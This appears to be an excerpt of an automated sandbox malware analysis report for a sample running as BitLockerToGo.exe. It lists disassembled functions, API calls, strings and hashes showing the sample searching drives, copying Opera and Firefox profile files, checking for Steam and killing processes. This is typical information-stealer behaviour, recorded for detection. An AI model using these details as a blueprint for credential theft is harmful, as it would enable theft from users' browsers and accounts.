                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1eb8739e784751feb9ba14c68aab54457c91f99375a685e18e2dec05610a8655
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ba6818e05c4dd3631b397b43ce15fcff701e3fd6783678b0f2bc687bf93f1595
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb8739e784751feb9ba14c68aab54457c91f99375a685e18e2dec05610a8655
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F302C732D802299BDB61FB25EE85BCDB3B6AF44350F4105E1AD48B3150DF71AF998E81
                                                                                                                                                                                                                                                                                                                                                          Function 02A16E7F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 144stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02A16EFF
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16F22
                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 02A16F2B
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02A16F4B
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02A16F65
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: FindFirstFileA.KERNEL32(?,?), ref: 02A16A70
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16A8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16A9D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A37A38), ref: 02A16ABE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A37A3C), ref: 02A16AD8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16AFF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: StrCmpCA.SHLWAPI(?,02A3766E), ref: 02A16B13
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: wsprintfA.USER32 ref: 02A16B3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: _memset.LIBCMT ref: 02A16B65
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A16A05: lstrcat.KERNEL32(?,?), ref: 02A16B7A
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A16F85
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A16FFF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cfe5bdc0457994e9862cd5dbc8fd5d62b22388a0baeea006cc37c4bde30a4636
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8afb26fc0f09e049f9323056e174d4b98d97c6d1f9ebd1197ec70f915831cfd0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfe5bdc0457994e9862cd5dbc8fd5d62b22388a0baeea006cc37c4bde30a4636
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 175149B1D40258AFDF319FA0CD84BDABBB9FF05314F0045A5EA48A2101EB319E99CF15
                                                                                                                                                                                                                                                                                                                                                          Function 02A0E5B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A38738,02A3796F,?,?,?), ref: 02A0E63A
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3873C), ref: 02A0E65B
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A38740), ref: 02A0E675
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,02A38744,?,02A3797D), ref: 02A0E701
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0E7DB
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0E8A6
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A0E949
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A0E95D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4887ad78a432f78a9208d2e359e800776e50086fd053219cc6b3cafa29d55fe1
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72bbdc06703e844696db985d156f9809f10a5016e1716e686b83c5d534d9da6c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4887ad78a432f78a9208d2e359e800776e50086fd053219cc6b3cafa29d55fe1
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26A1C931D402689BDB60EB24EE85BCDB7B6AF45350F4105A1AD48B7250DF31AF998F81
                                                                                                                                                                                                                                                                                                                                                          Function 02A0C528 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A385EC,02A378BB,?,?,?), ref: 02A0C5A0
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F0), ref: 02A0C5C1
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F4), ref: 02A0C5DB
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385F8,?,02A378BF), ref: 02A0C668
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0C6C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0BB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BBD3
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A0C834
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A0C848
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3801961486-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 360136f33e2da255b8c5b212acb62376620902e25c4839c866b9177e25907ddd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 85ee012a42d6617276ff40918b639562ad939e239bc4d10431250b55c69da372
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360136f33e2da255b8c5b212acb62376620902e25c4839c866b9177e25907ddd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 728111319401689BDB20FB34EE85BDD77B5AB08360F4106A1ED48A3150EF30EF598ED1
                                                                                                                                                                                                                                                                                                                                                          Function 02A142EE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 02A142F8
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A1431A
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A1432A
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A1433C
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 02A1434E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A14367
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7728f8681222aaafc9267baf97a15074159b567d03e82f2965ad6abc4bd33afb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1f94b78dcbb27d7455f3cad44404965c35186f18cc9aaab6f09e92879d691127
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7728f8681222aaafc9267baf97a15074159b567d03e82f2965ad6abc4bd33afb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F011674D411199BEB61DF649D49BEEB6F8BF09351F0002D5F909E2250DB308B41CF61
                                                                                                                                                                                                                                                                                                                                                          Function 02A14452 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02A1447E
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A1448E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,?), ref: 02A144A7
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02A144BA
                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 02A144C9
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A144D0
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A144DE
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A144E9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3e860801cecd441844c871a71857f0e54f035309026bd84409d6705e2b3f0ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e2f47330e91140567fb087d4abca652675578cafc5bffc0f5ab9df5c376bfa66
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3e860801cecd441844c871a71857f0e54f035309026bd84409d6705e2b3f0ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5115E35A40218ABDB219F64DC4ABEF7BF8BF49751F004595FD05E2140DF349A51CBA2
                                                                                                                                                                                                                                                                                                                                                          Function 02A12A37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,02A37812,?,?), ref: 02A12A68
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 02A12A76
                                                                                                                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A12A84
                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A12AB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 02A12B5B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
